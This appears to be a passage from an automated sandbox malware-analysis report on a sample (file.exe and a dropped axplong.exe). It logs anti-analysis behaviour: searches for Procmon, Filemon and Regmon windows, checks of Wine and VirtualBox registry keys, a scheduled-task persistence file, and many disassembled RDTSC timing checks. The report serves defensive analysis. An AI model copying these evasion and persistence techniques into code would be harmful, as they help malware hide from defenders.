                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect sandboxes / dynamic malware analysis system (registry check)
                  Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Tries to detect virtualization through RDTSC time measurements
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5009A second address: F500BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C8383A3h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jl 00007F389C83839Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F500BE second address: F500C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F500C6 second address: F500DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F500DC second address: F500E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B0AF second address: F6B0C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F389C838396h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F389C838396h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B0C6 second address: F6B0F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F389CFCC959h 0x0000000e jmp 00007F389CFCC94Fh 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B0F7 second address: F6B0FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B54E second address: F6B552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B699 second address: F6B6A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jg 00007F389C838396h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B7F3 second address: F6B801 instructions: 0x00000000 rdtsc 0x00000002 js 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B801 second address: F6B805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E67C second address: F6E68A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC94Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E68A second address: F6E690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E690 second address: F6E694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E6C7 second address: F6E6CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E6CB second address: F6E6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov esi, dword ptr [ebp+122D37A1h] 0x00000010 push 00000000h 0x00000012 movzx edx, di 0x00000015 push 92DEE0D8h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F389CFCC94Ah 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E6F1 second address: F6E6FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F389C838396h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E6FB second address: F6E766 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 6D211FA8h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F389CFCC948h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D2E1Ah], eax 0x0000002f xor dword ptr [ebp+122D2E3Fh], ebx 0x00000035 push 00000003h 0x00000037 and edi, dword ptr [ebp+122D3675h] 0x0000003d push 00000000h 0x0000003f push 00000003h 0x00000041 mov dword ptr [ebp+122D3349h], edi 0x00000047 call 00007F389CFCC949h 0x0000004c push esi 0x0000004d ja 00007F389CFCC94Ch 0x00000053 jno 00007F389CFCC946h 0x00000059 pop esi 0x0000005a push eax 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E766 second address: F6E776 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E776 second address: F6E77A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E77A second address: F6E79E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F389C83839Dh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007F389C838398h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E79E second address: F6E7CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC94Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sub dword ptr [ebp+122D304Bh], ecx 0x00000010 lea ebx, dword ptr [ebp+124635E8h] 0x00000016 jp 00007F389CFCC94Ch 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E7CB second address: F6E7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E7CF second address: F6E7D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E885 second address: F6E88B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E88B second address: F6E8CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC952h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or edi, dword ptr [ebp+122D3891h] 0x00000012 sbb esi, 71E0FEC1h 0x00000018 push 00000000h 0x0000001a jmp 00007F389CFCC94Eh 0x0000001f call 00007F389CFCC949h 0x00000024 push eax 0x00000025 push edx 0x00000026 push edi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E8CE second address: F6E8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E8D3 second address: F6E8FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F389CFCC951h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F389CFCC94Eh 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E8FB second address: F6E905 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F389C83839Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E905 second address: F6E920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jc 00007F389CFCC948h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F389CFCC946h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E920 second address: F6E924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E924 second address: F6E944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F389CFCC955h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E944 second address: F6E9EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push ecx 0x0000000d jmp 00007F389C8383A8h 0x00000012 pop ecx 0x00000013 pop eax 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F389C838398h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e sub dword ptr [ebp+122D3081h], ecx 0x00000034 push 00000003h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007F389C838398h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000019h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 push 00000000h 0x00000052 mov dword ptr [ebp+122D2942h], ecx 0x00000058 mov cx, ax 0x0000005b push 00000003h 0x0000005d mov edi, dword ptr [ebp+122D3999h] 0x00000063 call 00007F389C838399h 0x00000068 pushad 0x00000069 push edx 0x0000006a jmp 00007F389C8383A4h 0x0000006f pop edx 0x00000070 push esi 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E9EB second address: F6EA17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F389CFCC958h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F389CFCC946h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EA17 second address: F6EA25 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EA25 second address: F6EA29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EA29 second address: F6EA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EA32 second address: F6EA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F389CFCC946h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jnc 00007F389CFCC965h 0x00000016 pop eax 0x00000017 sub dword ptr [ebp+122D2942h], edi 0x0000001d lea ebx, dword ptr [ebp+124635F1h] 0x00000023 mov dword ptr [ebp+122D1B2Eh], ecx 0x00000029 xchg eax, ebx 0x0000002a push ebx 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EBCF second address: F6EBD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EBD3 second address: F6EC0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 1BEC2D6Eh 0x0000000d mov dword ptr [ebp+122D293Ch], edi 0x00000013 lea ebx, dword ptr [ebp+124635FCh] 0x00000019 mov cx, 75B2h 0x0000001d push eax 0x0000001e jns 00007F389CFCC965h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F389CFCC953h 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F5A7 second address: F8F5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F389C838396h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F389C83839Bh 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F5C1 second address: F8F5CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F5CD second address: F8F5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F55275 second address: F552AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F389CFCC94Dh 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F389CFCC954h 0x00000012 jmp 00007F389CFCC94Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D6ED second address: F8D6FC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F389C838396h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D6FC second address: F8D70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push edx 0x00000007 jbe 00007F389CFCC952h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8D844 second address: F8D84E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F389C838396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8DDB3 second address: F8DDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F389CFCC946h 0x0000000a popad 0x0000000b jmp 00007F389CFCC950h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8DDD1 second address: F8DDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F389C838396h 0x0000000a jmp 00007F389C83839Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E0DA second address: F8E0DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E0DF second address: F8E0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E0E5 second address: F8E0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E0E9 second address: F8E0ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E0ED second address: F8E10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F389CFCC958h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E361 second address: F8E366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E366 second address: F8E36E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E36E second address: F8E3BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F389C8383A3h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F389C83839Eh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jc 00007F389C8383B8h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007F389C8383A6h 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E633 second address: F8E63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F389CFCC946h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8E63D second address: F8E641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F83D7C second address: F83DB3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F389CFCC962h 0x00000008 js 00007F389CFCC946h 0x0000000e jmp 00007F389CFCC956h 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007F389CFCC946h 0x0000001b jmp 00007F389CFCC94Bh 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E54B second address: F4E570 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F389C838396h 0x00000008 jmp 00007F389C8383A7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E570 second address: F4E576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E576 second address: F4E57E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E57E second address: F4E58A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F389CFCC946h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E58A second address: F4E58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E58E second address: F4E5BA instructions: 0x00000000 rdtsc 0x00000002 js 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F389CFCC95Ah 0x00000010 jmp 00007F389CFCC954h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop ecx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F09C second address: F8F0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F929EB second address: F92A0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC957h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F389CFCC94Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93F36 second address: F93F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93F3E second address: F93F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5A1A8 second address: F5A1AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5A1AC second address: F5A1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5A1B0 second address: F5A1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F389C8383A8h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5377F second address: F53785 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F53785 second address: F537AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F389C838396h 0x0000000d jmp 00007F389C8383A5h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F537AA second address: F537B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9B575 second address: F9B590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F389C8383A7h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9B590 second address: F9B59A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F389CFCC946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9BC84 second address: F9BC88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
